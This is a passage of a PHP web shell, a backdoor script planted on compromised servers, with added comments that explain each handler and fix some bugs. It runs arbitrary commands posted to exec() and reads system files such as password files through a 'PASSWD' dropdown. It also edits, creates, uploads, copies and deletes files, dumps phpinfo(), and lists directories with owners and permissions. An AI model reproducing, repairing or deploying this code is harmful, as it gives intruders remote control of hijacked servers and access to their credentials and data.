@unlink($_POST['rm']);
}
else echo "<br>".font('red',e(4)."<br>");
}
else echo "<br>".font('red',e(0)."<br>");
}
|
|
#
|
|
#EXEC
|
|
// Passes the 'exec' field to exec() and prints the collected output lines in a textarea
// (unescaped). The guard tests the submit button 'exe', not the command field, so an
// empty command still reaches exec(). exec() returns the last output line, so a command
// that produces no output prints nothing at all.
if(!empty($_POST['exe'])){
if(@exec($_POST['exec'],$ar)){
echo "<textarea cols=70 rows=15>";
foreach($ar as $line){
echo $line."\n";
}
echo "</textarea>";}}
|
|
#
|
|
#OPEN FILE
|
|
// Show the file named in 'open' in an editable textarea (contents escaped). When the
// file is writable a "save" button and a hidden 'sv' field (path, unquoted attribute)
// are added for the save handler below. A directory is reported with e(2) "permission
// denied" here although e(4) is the code for "is a directory".
if(isset($_POST['op']) && $_POST['open']!=''){
if(!test_file($_POST['open'])){
if(!is_dir($_POST['open'])){
$fil=file($_POST['open']);
echo "<textarea cols=100 rows=20 name=edit>";
foreach($fil as $vv){
echo htmlspecialchars($vv);
}
echo "</textarea><br>".font('green',"FILE : ".$_POST['open'],3);
// `==1` is a loose comparison of the bool result; `is_writable(...)` alone is equivalent.
if(is_writable($_POST['open'])==1){
echo w(2).font('green','ACCESS GRANTED');
echo "<input type=submit name=save value=save><input type=hidden value=".$_POST['open']." name=sv>";
}}
else $error=font('red',e(2));
}
else $error=test_file($_POST['open']);
}
|
|
// Save handler for the editor above: overwrites the path in 'sv' with the textarea
// 'edit'. fopen() is not checked (a failure makes fputs()/fclose() operate on false)
// and the path is taken from the hidden field as posted.
if(isset($_POST['save'])){
$fr=fopen($_POST['sv'],"w");
$out=$_POST['edit'];
fputs($fr,$out);
fclose($fr);
}
|
|
#
|
|
#CREATE FILE
|
|
// "new file" step 1: if the parent directory of 'new' is writable, show an empty
// editor plus a hidden 'nf' field (path, unquoted attribute) for the create handler.
if(isset($_POST['cr']) && $_POST['new']!=''){
if(is_writable(dirname($_POST['new']))){
echo font('green',"Create new file : ".$_POST['new'],3)."<br><textarea name=newf cols=100 rows=20></textarea>
<input type=submit name=cre value=create>
<input type=hidden value=".$_POST['new']." name=nf>";
}
else echo "<br>".font('red',e(2)."<br>");
}
|
|
// "new file" step 2: write the 'newf' textarea to the path in 'nf'. Mode 'w+' truncates
// an existing file; fopen() is not checked.
if(isset($_POST['cre'])){
$ee=fopen($_POST['nf'],'w+');
$out=$_POST['newf'];
fputs($ee,$out);
fclose($ee);
}
|
|
#
|
|
#MKDIR
|
|
// mkdir 'mkdir'. Only the cwd is checked for writability, not the target's parent, and
// the mkdir() result is silenced, so the green "create" message is printed even when
// the directory was not created.
if(isset($_POST['mk']) && $_POST['mkdir']!=''){
if(is_writeable('./')){
@mkdir($_POST['mkdir']);
echo font('green',"dir ".b($_POST['mkdir'])." create");
}
else echo font('red',e(2));
}
|
|
#
|
|
// Echo the cwd back as hidden 'th' so the next request can chdir() to it (unquoted attribute).
echo "<input type=hidden name=th value=".getcwd()."></form>";
|
|
#UPLOAD FILE
|
|
#UPLOAD FILE
// Upload form ('menu' button) and its handler ('go_up'). The target name defaults to
// the client-supplied original filename and, when relative, is prefixed with 'th'
// (also client-supplied). If 'name' is absent altogether the first branch is skipped
// and $_POST['name'] is read undefined. The uploaded temp file is copied with copy()
// (not move_uploaded_file()) and the result is silenced.
if(isset($_POST['menu']) || isset($_POST['qq'])){
echo "
<form enctype=multipart/form-data method=post>
Save as :<input type=text name=name>File :<input name=userfile type=file>
<input type=submit value=Send name=go_up>
<input type=hidden name=qq>
<input type=hidden name=th value=".getcwd()."></form>";
if(isset($_POST['go_up'])){
if(isset($_POST['name']) && $_POST['name']==''){
$_POST['name']=$_FILES['userfile']['name'];}
if(!preg_match('/^\//',$_POST['name'])){
$_POST['name']=$_POST['th'].'/'.$_POST['name'];}
if(is_uploaded_file($_FILES['userfile']['tmp_name'])){
@copy($_FILES['userfile']['tmp_name'],$_POST['name']);}
else echo "<br>".font('red',"Permisions denied");}}
|
|
#
|
|
#TEST PERM
|
|
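// Report read/write access and the octal permission bits (mask 0777) of the path in
// POST 'test'. Sets nothing; everything is echoed directly.
if(isset($_POST['tes']) && $_POST['test']!=''){
$j=$_POST['test'];
if(file_exists($j)){
$w='';
if(is_writeable($j)){
$w=w(1).'WRITE'.w(1);
}
if(is_readable($j)){
$w.=w(1).'READ'.w(1);
}
echo font('green',$w.sprintf("%o", (fileperms($_POST['test'])) & 0777));
}
// Fix: the original called `$e(0)` — a variable function on the undefined $e — which
// is a fatal error whenever the path does not exist. The helper is e(0).
else echo font('red',e(0));
}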
|
|
#
|
|
#COPY
|
|
// Copy 'strin' to 'remot' after checking that the destination directory exists and is
// writable and the source exists and is readable. copy() itself is silenced, so a failed
// copy that passed all four checks reports nothing.
if(isset($_POST['copy'])&& $_POST['strin']!='' && $_POST['remot']!=''){
if(file_exists(dirname($_POST['remot']))){
if(file_exists($_POST['strin'])){
if(is_writable(dirname($_POST['remot']))){
if(is_readable($_POST['strin'])){
@copy($_POST['strin'],$_POST['remot']);
}
else echo font('red',"no read string file");
}
else echo font('red',"no write dest directory");
}
else echo font('red',"no such file");
}
else echo font('red',"no such dest dir");
}
|
|
#
|
|
#CHECK DISK
|
|
// Free / total space of the filesystem holding 'dirfree', in MiB. No input named
// 'free' or 'dirfree' appears in the form markup on this page, so this branch looks
// unreachable from the rendered UI. disk_*_space() failures are silenced, and a false
// result divided by 1048576 prints as 0.
if(isset($_POST['free']) && $_POST['dirfree']!=''){
if(file_exists($_POST['dirfree'])){
$fre=@disk_free_space($_POST['dirfree'])/1048576;
echo font('green',"Free space in ".b($_POST['dirfree'])." : ".$fre." Mb");
$fre1=@disk_total_space($_POST['dirfree'])/1048576;
echo "<br>".font('green',"Full size in ".b($_POST['dirfree'])." : ".$fre1." Mb");
}
else echo font('red',"No such disk");
}
|
|
#
|
|
// "phpinfo" button: dumps the full phpinfo() page inline (configuration, paths, env).
(isset($_POST['info']))?phpinfo():null;
|
|
#
|
|
#PASSWD
|
|
#PASSWD
// "read file": prints the file chosen in the system-file dropdown, unescaped, inside a
// textarea. @file() returns false on an unreadable path, which makes foreach warn.
if(!empty($_POST['passwd']) && isset($_POST['passw'])){
echo "<center>".font('blue',"file : ".$_POST['passwd'],6)."</center><br><textarea cols=100 rows=15>\n";
foreach(@file($_POST['passwd']) as $fed)echo $fed;
echo "</textarea><br>\n";}
|
|
#
|
|
// Print whichever $error the handlers above set last (only one survives).
if(isset($error))echo $error;?>
|
|
<hr><?php
|
|
##################################################################################
|
|
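// Directory listing of the cwd: one row per entry with access flags (R / RW), octal
// permission bits, owner/group, size (or DIR / link), mtime and the escaped name.
// $arr is initialised up front so sort() below gets an array even when opendir() fails
// on a readable directory (the original left it undefined in that case).
$arr=array();
if(is_readable(getcwd())){
if($h=opendir(getcwd())){
while(false!==($f=readdir($h))){array_push ($arr,$f);}
closedir($h);}}
else die("<center>".b(font('red','FUNCTION LIST PERMISSION DENIED',6))."</center>");
sort($arr);
echo '<table width=800 bgcolor=#DFD6C8 cellspacing=0 cellpadding=0 border=1>';
foreach($arr as $f){
$l=@lstat($f);
// lstat() returns false on failure; do not index into false (uid/gid/size).
$uid=(is_array($l)?$l[4]:false);
$gid=(is_array($l)?$l[5]:false);
$size=(is_array($l)?$l[7]:'');
print((is_readable($f) && is_writeable($f))?"<tr><td>".w(1).b("R".w(1).font('red','RW',3)).w(1):(((is_readable($f))?"<tr><td>".w(1).b("R").w(4):"").((is_writable($f))?"<tr><td>".w(1).b(font('red','RW',3)):"")));
$r=sprintf("%o",(@fileperms($f)) & 0777);
// posix_* may be unavailable (non-POSIX builds) or return false for an unknown id;
// in both cases fall back to the numeric owner/group from fileowner()/filegroup().
$ow=(function_exists('posix_getpwuid') && $uid!==false)?posix_getpwuid($uid):false;
$gr=(function_exists('posix_getgrgid') && $gid!==false)?posix_getgrgid($gid):false;
$fow=((is_array($ow) && !empty($ow["name"]))?$ow["name"]:fileowner($f))."/".((is_array($gr) && !empty($gr["name"]))?$gr["name"]:filegroup($f));
if(!is_readable($f) && !is_writeable($f)) echo "<tr><td>".w(12);
echo "</td><td>$r</td><td>$fow</td>";
if(!is_dir($f)){
if(!is_link($f)){
echo w(2)."<td><i>".$size."</i></td>";}
else echo "</td><td>link</td>";}
else echo "</td><td>DIR</td>";
$fi=htmlspecialchars($f);
// strftime() is deprecated since PHP 8.1 (the @ hides the notice); kept because its
// locale-aware, space-padded '%e' format has no exact date() equivalent.
echo "<td>".@strftime('%B %e %H:%M',@filemtime($f))."</td><td>".(is_dir($f)?font('blue',$fi,3):$fi)."</td>\n";}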
|
|
?>
|
|
</table></body></html>
|
|
<?php exit; ?>
|